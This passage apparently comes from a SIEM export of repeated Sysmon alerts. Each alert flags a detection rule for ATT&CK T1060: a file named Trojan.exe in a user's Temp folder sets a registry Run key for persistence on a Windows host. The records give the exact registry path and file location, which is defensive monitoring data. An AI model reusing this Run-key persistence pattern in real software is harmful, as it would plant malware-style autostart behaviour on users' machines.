HKU\S-1-5-21-438079597-2123118846-2669748851-1001\Software\Microsoft\Windows\CurrentVersion\Run\5cd8f17f4086744065eb0992a09e05a2 +Details: ""C:\Users\John Williams\AppData\Local\Temp\Trojan.exe"" ..""",,"HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-22T13:22:46.141602000Z"",""eventRecordID"":""1259"",""processID"":""2292"",""threadID"":""3260"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1060,RunKey\r\nEventType: SetValue\r\nUtcTime: 2020-05-22 13:22:46.131\r\nProcessGuid: {df9fc3d3-d1c5-5ec7-0000-001082ab2600}\r\nProcessId: 7072\r\nImage: C:\\Users\\JOHNWI~1\\AppData\\Local\\Temp\\Trojan.exe\r\nTargetObject: HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2\r\nDetails: \""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" ..\""""},""eventdata"":{""ruleName"":""T1060,RunKey"",""eventType"":""SetValue"",""utcTime"":""2020-05-22 13:22:46.131"",""processGuid"":""{df9fc3d3-d1c5-5ec7-0000-001082ab2600}"",""processId"":""7072"",""image"":""C:\\\\Users\\\\JOHNWI~1\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe"",""targetObject"":""HKU\\\\S-1-5-21-438079597-2123118846-2669748851-1001\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\5cd8f17f4086744065eb0992a09e05a2"",""details"":""\\\""C:\\\\Users\\\\John Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe\\\"" ..""}}}","\""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" .." +"May 24, 2020 @ 16:19:58.343",14,"ATT&CK T1060: New RUN Key Pointing to Suspicious Folder","""Registry value set: +RuleName: T1060,RunKey +EventType: SetValue +UtcTime: 2020-05-22 13:22:45.092 +ProcessGuid: {df9fc3d3-d1c5-5ec7-0000-001082ab2600} +ProcessId: 7072 +Image: C:\Users\JOHNWI~1\AppData\Local\Temp\Trojan.exe +TargetObject: HKU\S-1-5-21-438079597-2123118846-2669748851-1001\Software\Microsoft\Windows\CurrentVersion\Run\5cd8f17f4086744065eb0992a09e05a2 +Details: ""C:\Users\John Williams\AppData\Local\Temp\Trojan.exe"" ..""",,"HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-22T13:22:45.118059300Z"",""eventRecordID"":""1258"",""processID"":""2292"",""threadID"":""3260"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1060,RunKey\r\nEventType: SetValue\r\nUtcTime: 2020-05-22 13:22:45.092\r\nProcessGuid: {df9fc3d3-d1c5-5ec7-0000-001082ab2600}\r\nProcessId: 7072\r\nImage: C:\\Users\\JOHNWI~1\\AppData\\Local\\Temp\\Trojan.exe\r\nTargetObject: HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2\r\nDetails: \""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" ..\""""},""eventdata"":{""ruleName"":""T1060,RunKey"",""eventType"":""SetValue"",""utcTime"":""2020-05-22 13:22:45.092"",""processGuid"":""{df9fc3d3-d1c5-5ec7-0000-001082ab2600}"",""processId"":""7072"",""image"":""C:\\\\Users\\\\JOHNWI~1\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe"",""targetObject"":""HKU\\\\S-1-5-21-438079597-2123118846-2669748851-1001\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\5cd8f17f4086744065eb0992a09e05a2"",""details"":""\\\""C:\\\\Users\\\\John Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe\\\"" ..""}}}","\""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" .." +"May 24, 2020 @ 16:19:57.249",14,"ATT&CK T1060: New RUN Key Pointing to Suspicious Folder","""Registry value set: +RuleName: T1060,RunKey +EventType: SetValue +UtcTime: 2020-05-22 13:22:43.988 +ProcessGuid: {df9fc3d3-d1c5-5ec7-0000-001082ab2600} +ProcessId: 7072 +Image: C:\Users\JOHNWI~1\AppData\Local\Temp\Trojan.exe +TargetObject: HKU\S-1-5-21-438079597-2123118846-2669748851-1001\Software\Microsoft\Windows\CurrentVersion\Run\5cd8f17f4086744065eb0992a09e05a2 +Details: ""C:\Users\John Williams\AppData\Local\Temp\Trojan.exe"" ..""",,"HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-22T13:22:43.993861500Z"",""eventRecordID"":""1256"",""processID"":""2292"",""threadID"":""3260"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1060,RunKey\r\nEventType: SetValue\r\nUtcTime: 2020-05-22 13:22:43.988\r\nProcessGuid: {df9fc3d3-d1c5-5ec7-0000-001082ab2600}\r\nProcessId: 7072\r\nImage: C:\\Users\\JOHNWI~1\\AppData\\Local\\Temp\\Trojan.exe\r\nTargetObject: HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2\r\nDetails: \""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" ..\""""},""eventdata"":{""ruleName"":""T1060,RunKey"",""eventType"":""SetValue"",""utcTime"":""2020-05-22 13:22:43.988"",""processGuid"":""{df9fc3d3-d1c5-5ec7-0000-001082ab2600}"",""processId"":""7072"",""image"":""C:\\\\Users\\\\JOHNWI~1\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe"",""targetObject"":""HKU\\\\S-1-5-21-438079597-2123118846-2669748851-1001\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\5cd8f17f4086744065eb0992a09e05a2"",""details"":""\\\""C:\\\\Users\\\\John Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe\\\"" ..""}}}","\""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" .." +"May 24, 2020 @ 16:19:56.130",14,"ATT&CK T1060: New RUN Key Pointing to Suspicious Folder","""Registry value set: +RuleName: T1060,RunKey +EventType: SetValue +UtcTime: 2020-05-22 13:22:42.982 +ProcessGuid: {df9fc3d3-d1c5-5ec7-0000-001082ab2600} +ProcessId: 7072 +Image: C:\Users\JOHNWI~1\AppData\Local\Temp\Trojan.exe +TargetObject: HKU\S-1-5-21-438079597-2123118846-2669748851-1001\Software\Microsoft\Windows\CurrentVersion\Run\5cd8f17f4086744065eb0992a09e05a2 +Details: ""C:\Users\John Williams\AppData\Local\Temp\Trojan.exe"" ..""",,"HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-22T13:22:42.983857800Z"",""eventRecordID"":""1254"",""processID"":""2292"",""threadID"":""3260"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1060,RunKey\r\nEventType: SetValue\r\nUtcTime: 2020-05-22 13:22:42.982\r\nProcessGuid: {df9fc3d3-d1c5-5ec7-0000-001082ab2600}\r\nProcessId: 7072\r\nImage: C:\\Users\\JOHNWI~1\\AppData\\Local\\Temp\\Trojan.exe\r\nTargetObject: HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2\r\nDetails: \""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" ..\""""},""eventdata"":{""ruleName"":""T1060,RunKey"",""eventType"":""SetValue"",""utcTime"":""2020-05-22 13:22:42.982"",""processGuid"":""{df9fc3d3-d1c5-5ec7-0000-001082ab2600}"",""processId"":""7072"",""image"":""C:\\\\Users\\\\JOHNWI~1\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe"",""targetObject"":""HKU\\\\S-1-5-21-438079597-2123118846-2669748851-1001\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\5cd8f17f4086744065eb0992a09e05a2"",""details"":""\\\""C:\\\\Users\\\\John Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe\\\"" ..""}}}","\""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" .." +"May 24, 2020 @ 16:19:55.128",14,"ATT&CK T1060: New RUN Key Pointing to Suspicious Folder","""Registry value set: +RuleName: T1060,RunKey +EventType: SetValue +UtcTime: 2020-05-22 13:22:41.974 +ProcessGuid: {df9fc3d3-d1c5-5ec7-0000-001082ab2600} +ProcessId: 7072 +Image: C:\Users\JOHNWI~1\AppData\Local\Temp\Trojan.exe +TargetObject: HKU\S-1-5-21-438079597-2123118846-2669748851-1001\Software\Microsoft\Windows\CurrentVersion\Run\5cd8f17f4086744065eb0992a09e05a2 +Details: ""C:\Users\John Williams\AppData\Local\Temp\Trojan.exe"" ..""",,"HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-22T13:22:41.981259300Z"",""eventRecordID"":""1253"",""processID"":""2292"",""threadID"":""3260"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1060,RunKey\r\nEventType: SetValue\r\nUtcTime: 2020-05-22 13:22:41.974\r\nProcessGuid: {df9fc3d3-d1c5-5ec7-0000-001082ab2600}\r\nProcessId: 7072\r\nImage: C:\\Users\\JOHNWI~1\\AppData\\Local\\Temp\\Trojan.exe\r\nTargetObject: HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2\r\nDetails: \""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" ..\""""},""eventdata"":{""ruleName"":""T1060,RunKey"",""eventType"":""SetValue"",""utcTime"":""2020-05-22 13:22:41.974"",""processGuid"":""{df9fc3d3-d1c5-5ec7-0000-001082ab2600}"",""processId"":""7072"",""image"":""C:\\\\Users\\\\JOHNWI~1\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe"",""targetObject"":""HKU\\\\S-1-5-21-438079597-2123118846-2669748851-1001\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\5cd8f17f4086744065eb0992a09e05a2"",""details"":""\\\""C:\\\\Users\\\\John Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe\\\"" ..""}}}","\""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" .." +"May 24, 2020 @ 16:19:54.088",14,"ATT&CK T1060: New RUN Key Pointing to Suspicious Folder","""Registry value set: +RuleName: T1060,RunKey +EventType: SetValue +UtcTime: 2020-05-22 13:22:40.951 +ProcessGuid: {df9fc3d3-d1c5-5ec7-0000-001082ab2600} +ProcessId: 7072 +Image: C:\Users\JOHNWI~1\AppData\Local\Temp\Trojan.exe +TargetObject: HKU\S-1-5-21-438079597-2123118846-2669748851-1001\Software\Microsoft\Windows\CurrentVersion\Run\5cd8f17f4086744065eb0992a09e05a2 +Details: ""C:\Users\John Williams\AppData\Local\Temp\Trojan.exe"" ..""",,"HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-22T13:22:40.976837000Z"",""eventRecordID"":""1252"",""processID"":""2292"",""threadID"":""3260"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1060,RunKey\r\nEventType: SetValue\r\nUtcTime: 2020-05-22 13:22:40.951\r\nProcessGuid: {df9fc3d3-d1c5-5ec7-0000-001082ab2600}\r\nProcessId: 7072\r\nImage: C:\\Users\\JOHNWI~1\\AppData\\Local\\Temp\\Trojan.exe\r\nTargetObject: HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2\r\nDetails: \""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" ..\""""},""eventdata"":{""ruleName"":""T1060,RunKey"",""eventType"":""SetValue"",""utcTime"":""2020-05-22 13:22:40.951"",""processGuid"":""{df9fc3d3-d1c5-5ec7-0000-001082ab2600}"",""processId"":""7072"",""image"":""C:\\\\Users\\\\JOHNWI~1\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe"",""targetObject"":""HKU\\\\S-1-5-21-438079597-2123118846-2669748851-1001\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\5cd8f17f4086744065eb0992a09e05a2"",""details"":""\\\""C:\\\\Users\\\\John Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe\\\"" ..""}}}","\""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" .." +"May 24, 2020 @ 16:19:53.201",14,"ATT&CK T1060: New RUN Key Pointing to Suspicious Folder","""Registry value set: +RuleName: T1060,RunKey +EventType: SetValue +UtcTime: 2020-05-22 13:22:39.925 +ProcessGuid: {df9fc3d3-d1c5-5ec7-0000-001082ab2600} +ProcessId: 7072 +Image: C:\Users\JOHNWI~1\AppData\Local\Temp\Trojan.exe +TargetObject: HKU\S-1-5-21-438079597-2123118846-2669748851-1001\Software\Microsoft\Windows\CurrentVersion\Run\5cd8f17f4086744065eb0992a09e05a2 +Details: ""C:\Users\John Williams\AppData\Local\Temp\Trojan.exe"" ..""",,"HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-22T13:22:39.927552800Z"",""eventRecordID"":""1249"",""processID"":""2292"",""threadID"":""3260"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1060,RunKey\r\nEventType: SetValue\r\nUtcTime: 2020-05-22 13:22:39.925\r\nProcessGuid: {df9fc3d3-d1c5-5ec7-0000-001082ab2600}\r\nProcessId: 7072\r\nImage: C:\\Users\\JOHNWI~1\\AppData\\Local\\Temp\\Trojan.exe\r\nTargetObject: HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2\r\nDetails: \""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" ..\""""},""eventdata"":{""ruleName"":""T1060,RunKey"",""eventType"":""SetValue"",""utcTime"":""2020-05-22 13:22:39.925"",""processGuid"":""{df9fc3d3-d1c5-5ec7-0000-001082ab2600}"",""processId"":""7072"",""image"":""C:\\\\Users\\\\JOHNWI~1\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe"",""targetObject"":""HKU\\\\S-1-5-21-438079597-2123118846-2669748851-1001\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\5cd8f17f4086744065eb0992a09e05a2"",""details"":""\\\""C:\\\\Users\\\\John Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe\\\"" ..""}}}","\""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" .." +"May 24, 2020 @ 16:19:52.192",14,"ATT&CK T1060: New RUN Key Pointing to Suspicious Folder","""Registry value set: +RuleName: T1060,RunKey +EventType: SetValue +UtcTime: 2020-05-22 13:22:38.810 +ProcessGuid: {df9fc3d3-d1c5-5ec7-0000-001082ab2600} +ProcessId: 7072 +Image: C:\Users\JOHNWI~1\AppData\Local\Temp\Trojan.exe +TargetObject: HKU\S-1-5-21-438079597-2123118846-2669748851-1001\Software\Microsoft\Windows\CurrentVersion\Run\5cd8f17f4086744065eb0992a09e05a2 +Details: ""C:\Users\John Williams\AppData\Local\Temp\Trojan.exe"" ..""",,"HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-22T13:22:38.812429200Z"",""eventRecordID"":""1247"",""processID"":""2292"",""threadID"":""3260"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1060,RunKey\r\nEventType: SetValue\r\nUtcTime: 2020-05-22 13:22:38.810\r\nProcessGuid: {df9fc3d3-d1c5-5ec7-0000-001082ab2600}\r\nProcessId: 7072\r\nImage: C:\\Users\\JOHNWI~1\\AppData\\Local\\Temp\\Trojan.exe\r\nTargetObject: HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2\r\nDetails: \""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" ..\""""},""eventdata"":{""ruleName"":""T1060,RunKey"",""eventType"":""SetValue"",""utcTime"":""2020-05-22 13:22:38.810"",""processGuid"":""{df9fc3d3-d1c5-5ec7-0000-001082ab2600}"",""processId"":""7072"",""image"":""C:\\\\Users\\\\JOHNWI~1\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe"",""targetObject"":""HKU\\\\S-1-5-21-438079597-2123118846-2669748851-1001\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\5cd8f17f4086744065eb0992a09e05a2"",""details"":""\\\""C:\\\\Users\\\\John Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe\\\"" ..""}}}","\""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" .." +"May 24, 2020 @ 16:19:51.399",14,"ATT&CK T1060: New RUN Key Pointing to Suspicious Folder","""Registry value set: +RuleName: T1060,RunKey +EventType: SetValue +UtcTime: 2020-05-22 13:22:37.793 +ProcessGuid: {df9fc3d3-d1c5-5ec7-0000-001082ab2600} +ProcessId: 7072 +Image: C:\Users\JOHNWI~1\AppData\Local\Temp\Trojan.exe +TargetObject: HKU\S-1-5-21-438079597-2123118846-2669748851-1001\Software\Microsoft\Windows\CurrentVersion\Run\5cd8f17f4086744065eb0992a09e05a2 +Details: ""C:\Users\John Williams\AppData\Local\Temp\Trojan.exe"" ..""",,"HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-22T13:22:37.804952100Z"",""eventRecordID"":""1246"",""processID"":""2292"",""threadID"":""3260"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1060,RunKey\r\nEventType: SetValue\r\nUtcTime: 2020-05-22 13:22:37.793\r\nProcessGuid: {df9fc3d3-d1c5-5ec7-0000-001082ab2600}\r\nProcessId: 7072\r\nImage: C:\\Users\\JOHNWI~1\\AppData\\Local\\Temp\\Trojan.exe\r\nTargetObject: HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2\r\nDetails: \""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" ..\""""},""eventdata"":{""ruleName"":""T1060,RunKey"",""eventType"":""SetValue"",""utcTime"":""2020-05-22 13:22:37.793"",""processGuid"":""{df9fc3d3-d1c5-5ec7-0000-001082ab2600}"",""processId"":""7072"",""image"":""C:\\\\Users\\\\JOHNWI~1\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe"",""targetObject"":""HKU\\\\S-1-5-21-438079597-2123118846-2669748851-1001\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\5cd8f17f4086744065eb0992a09e05a2"",""details"":""\\\""C:\\\\Users\\\\John Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe\\\"" ..""}}}","\""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" .." +"May 24, 2020 @ 16:19:51.357",14,"ATT&CK T1060: New RUN Key Pointing to Suspicious Folder","""Registry value set: +RuleName: T1060,RunKey +EventType: SetValue +UtcTime: 2020-05-22 13:22:36.779 +ProcessGuid: {df9fc3d3-d1c5-5ec7-0000-001082ab2600} +ProcessId: 7072 +Image: C:\Users\JOHNWI~1\AppData\Local\Temp\Trojan.exe +TargetObject: HKU\S-1-5-21-438079597-2123118846-2669748851-1001\Software\Microsoft\Windows\CurrentVersion\Run\5cd8f17f4086744065eb0992a09e05a2 +Details: ""C:\Users\John Williams\AppData\Local\Temp\Trojan.exe"" ..""",,"HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-22T13:22:36.787298100Z"",""eventRecordID"":""1243"",""processID"":""2292"",""threadID"":""3260"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1060,RunKey\r\nEventType: SetValue\r\nUtcTime: 2020-05-22 13:22:36.779\r\nProcessGuid: {df9fc3d3-d1c5-5ec7-0000-001082ab2600}\r\nProcessId: 7072\r\nImage: C:\\Users\\JOHNWI~1\\AppData\\Local\\Temp\\Trojan.exe\r\nTargetObject: HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2\r\nDetails: \""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" ..\""""},""eventdata"":{""ruleName"":""T1060,RunKey"",""eventType"":""SetValue"",""utcTime"":""2020-05-22 13:22:36.779"",""processGuid"":""{df9fc3d3-d1c5-5ec7-0000-001082ab2600}"",""processId"":""7072"",""image"":""C:\\\\Users\\\\JOHNWI~1\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe"",""targetObject"":""HKU\\\\S-1-5-21-438079597-2123118846-2669748851-1001\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\5cd8f17f4086744065eb0992a09e05a2"",""details"":""\\\""C:\\\\Users\\\\John Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe\\\"" ..""}}}","\""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" .." +"May 24, 2020 @ 16:19:48.905",14,"ATT&CK T1060: New RUN Key Pointing to Suspicious Folder","""Registry value set: +RuleName: T1060,RunKey +EventType: SetValue +UtcTime: 2020-05-22 13:22:35.751 +ProcessGuid: {df9fc3d3-d1c5-5ec7-0000-001082ab2600} +ProcessId: 7072 +Image: C:\Users\JOHNWI~1\AppData\Local\Temp\Trojan.exe +TargetObject: HKU\S-1-5-21-438079597-2123118846-2669748851-1001\Software\Microsoft\Windows\CurrentVersion\Run\5cd8f17f4086744065eb0992a09e05a2 +Details: ""C:\Users\John Williams\AppData\Local\Temp\Trojan.exe"" ..""",,"HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2","{""win"":{""system"":{""providerName"":""Microsoft-Windows-Sysmon"",""providerGuid"":""{5770385f-c22a-43e0-bf4c-06f5698ffbd9}"",""eventID"":""13"",""version"":""2"",""level"":""4"",""task"":""13"",""opcode"":""0"",""keywords"":""0x8000000000000000"",""systemTime"":""2020-05-22T13:22:35.775153000Z"",""eventRecordID"":""1242"",""processID"":""2292"",""threadID"":""3260"",""channel"":""Microsoft-Windows-Sysmon/Operational"",""computer"":""DESKTOP-HUE026H"",""severityValue"":""INFORMATION"",""message"":""\""Registry value set:\r\nRuleName: T1060,RunKey\r\nEventType: SetValue\r\nUtcTime: 2020-05-22 13:22:35.751\r\nProcessGuid: {df9fc3d3-d1c5-5ec7-0000-001082ab2600}\r\nProcessId: 7072\r\nImage: C:\\Users\\JOHNWI~1\\AppData\\Local\\Temp\\Trojan.exe\r\nTargetObject: HKU\\S-1-5-21-438079597-2123118846-2669748851-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\5cd8f17f4086744065eb0992a09e05a2\r\nDetails: \""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" ..\""""},""eventdata"":{""ruleName"":""T1060,RunKey"",""eventType"":""SetValue"",""utcTime"":""2020-05-22 13:22:35.751"",""processGuid"":""{df9fc3d3-d1c5-5ec7-0000-001082ab2600}"",""processId"":""7072"",""image"":""C:\\\\Users\\\\JOHNWI~1\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe"",""targetObject"":""HKU\\\\S-1-5-21-438079597-2123118846-2669748851-1001\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run\\\\5cd8f17f4086744065eb0992a09e05a2"",""details"":""\\\""C:\\\\Users\\\\John Williams\\\\AppData\\\\Local\\\\Temp\\\\Trojan.exe\\\"" ..""}}}","\""C:\\Users\\John Williams\\AppData\\Local\\Temp\\Trojan.exe\"" .." +"May 24, 2020 @ 16:19:47.864",14,"ATT&CK T1060: New RUN Key Pointing to Suspicious Folder","""Registry value set: +RuleName: T1060,RunKey +EventType: SetValue +UtcTime: 2020-05-22 13:22:34.686 +ProcessGuid: {df9fc3d3-d1c5-5ec7-0000-001082ab2600} +ProcessId: 7072 +Image: C:\Users\JOHNWI~1\AppData\Local\Temp\Trojan.exe +TargetObject: 